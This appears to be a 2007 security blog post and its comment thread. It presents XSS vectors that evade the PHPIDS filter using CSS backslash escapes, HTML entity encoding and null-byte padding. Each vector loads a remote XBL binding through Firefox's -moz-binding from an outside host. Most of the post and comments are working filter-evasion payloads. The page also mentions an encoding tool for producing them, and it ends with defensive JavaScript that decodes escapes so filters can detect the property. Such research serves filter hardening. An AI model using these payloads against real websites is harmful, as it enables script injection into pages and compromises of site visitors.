Awesome XSS

Hacking the PHPIDS again I found some cool XSS:-

<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business
\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

I’ve moved it onto two lines for correct display.

Who’d have thought that Firefox would allow all that within the url and CSS properties :D


Comments 11

  1. 排 尾 DaCat wrote:

    awezome gareth!! :D
    anyway, I thought .mario disabled the \char thing a while ago.. or maybe it was just the \a and \l :P

    Greetz!

    Posted 24 Nov 2007 at 7:40 pm
  2. Gareth Heyes wrote:

    hehe thanks, you next? :)

    Posted 25 Nov 2007 at 1:07 am
  3. Gareth Heyes wrote:

    Check these out too :)

    <div/style=&#92&#45&#92&#109&#111&#92&#122&#92&#45&
    #98&#92&#105&#92&#110&#100&#92&#105&#110&#92&#103:&
    #92&#117&#114&#108&#40&#47&#47&#98&#117&#115&#105&
    #110&#101&#115&#115&#92&#105&#92&#110&#102&#111&#46&
    #99&#111&#46&#117&#107&#92&#47&#108&#97&#98&#115
    &#92&#47&#120&#98&#108&#92&#47&#120&#98&#108&#92
    &#46&#120&#109&#108&#92&#35&#120&#115&#115&#41&>

    <div style=&#x2D&#x6D&#x6F&#x7A&#x2D&#x62&#x69&#x6E&#x64&
    #x69&#x6E&#x67:&#x75&#x72&#x6C&#x28&#x2F&#x2F&#x62&#x75&
    #x73&#x69&#x6E&#x65&#x73&#x73&#x69&#x6E&#x66&#x6F&#x2E&
    #x63&#x6F&#x2E&#x75&#x6B&#x2F&#x6C&#x61&#x62&#x73&#x2F&
    #x78&#x62&#x6C&#x2F&#x78&#x62&#x6C&#x2E&#x78&#x6D&#x6C
    &#x23&#x78&#x73&#x73&#x29>

    Posted 25 Nov 2007 at 1:17 am
  4. Gareth Heyes wrote:

    <div&nbsp &nbsp style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    <Q%^&*(£@!’” style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)>

    Posted 25 Nov 2007 at 1:37 am
  5. Information security wrote:

    A tool to automate your XSS hacking/testing attempts based on the ha.ckers.org xss attacks xml. If it's getting easier to test for XSS vulnerabilities, then it's getting easier to exploit those vulnerabilities.

    Posted 25 Nov 2007 at 11:10 am
  6. .mario wrote:

    Gareth you bandit ;) Hacking the PHPIDS while I visit my gram's place *g*

    Well done and of course fixed by now!

    Thanks and Greetings,
    .mario

    Posted 25 Nov 2007 at 10:01 pm
  7. Gareth Heyes wrote:

    Hehe a hacker always attacks at the most inconvenient time ;)

    Posted 26 Nov 2007 at 1:12 am
  8. Gareth Heyes wrote:

    Believe it or not this is also a working mozbinding lol :-
    <x/style=-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:\0u\0r\0l\0(\0/\0/b\0u\0s\0i\0ne\0s\0s\0i\0nf\0o\0.c\0o\0.\0u\0k\0/\0la\0b\0s\0/\0x\0b\0l\0/\0x\0b\0l\0.\0x\0m\0l\0#\0x\0s\0s\0)>

    Posted 26 Nov 2007 at 1:32 am
  9. Gareth Heyes wrote:

    <x/style=-\m\000000o\000000z\000000-b\000000i\000000nd\000000i\000000n\000000g\000000:\000000u\000000r\000000l\000000(\000000/\000000/b\000000u\000000s\000000i\000000ne\000000s\000000s\000000i\000000nf\000000o\000000.c\000000o\000000.\000000u\000000k\000000/\000000la\000000b\000000s\000000/\000000x\000000b\000000l\000000/\000000x\000000b\000000l\000000.\000000x\000000m\000000l\000000#\000000x\000000s\000000s\000000)>

    Posted 26 Nov 2007 at 1:48 am
  10. .mario wrote:

    Eew… that’s indeed incredible! We need those ones for the xssDB!

    Posted 26 Nov 2007 at 8:36 am
  11. Gareth Heyes wrote:

    I’ve added this functionality to Hackvertor as a tag (backslashesc) under filter evasion:-

    <div/style=<@backslashesc>-moz-binding<@/backslashesc>:<@backslashesc>url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)<@/backslashesc>>

    Much easier than having to remember which characters can be escaped ;)

    Posted 26 Nov 2007 at 12:42 pm
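
Every vector in the post and comments resolves to the same -moz-binding:url(...) declaration once HTML character references and CSS backslash escapes are decoded, so a filter has to match on the decoded form rather than the raw attribute. The following is an added example of that canonicalisation, not code from the post, the commenters or PHPIDS; the function names are hypothetical and dropping control characters before matching is an assumption made here.

```javascript
// Added example: canonicalise a style attribute value before matching it
// against a blocklisted CSS property. Function names are hypothetical.

// Decode numeric HTML character references. The trailing ';' is optional,
// which is what the entity-encoded variants in the comments rely on.
function decodeHtmlNumericRefs(s) {
  return s.replace(/&#(?:[xX]([0-9a-fA-F]{1,6})|([0-9]{1,7}));?/g, (m, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\uFFFD";
  });
}

// Decode CSS escapes: '\' + 1-6 hex digits (+ one optional whitespace) is a
// code point; '\' + any other non-newline character is that character itself.
// That is why \m, \z, \i, \n, \g and \u decode to plain letters.
function decodeCssEscapes(s) {
  const re = /\\(?:([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?|([^\r\n\f]))/g;
  return s.replace(re, (m, hex, ch) => {
    if (ch !== undefined) return ch;
    const cp = parseInt(hex, 16);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : "\uFFFD";
  });
}

// Canonical form used only for matching: decode both layers, drop control
// characters (the \0 padding decodes to U+0000), then lowercase.
// Assumption: dropping controls is the conservative choice for a filter.
function canonicalStyle(value) {
  const css = decodeCssEscapes(decodeHtmlNumericRefs(value));
  return css.replace(/[\u0000-\u001f\u007f]/g, "").toLowerCase();
}

function usesMozBinding(value) {
  return /-moz-binding\s*:/.test(canonicalStyle(value));
}

// Style value from the post, joined onto one line.
const POST_VECTOR = String.raw`\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)`;
// Constructed sample in the style of comment 8 (\0 padding), shortened.
const NUL_PADDED = String.raw`-m\0o\0z\0-b\0i\0nd\0i\0n\0g\0:url(x)`;
// Constructed benign value that must not be flagged.
const BENIGN = "color:red; background:url(/img/a.png)";

for (const v of [POST_VECTOR, NUL_PADDED, BENIGN]) {
  console.log(usesMozBinding(v), JSON.stringify(canonicalStyle(v)));
}
```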
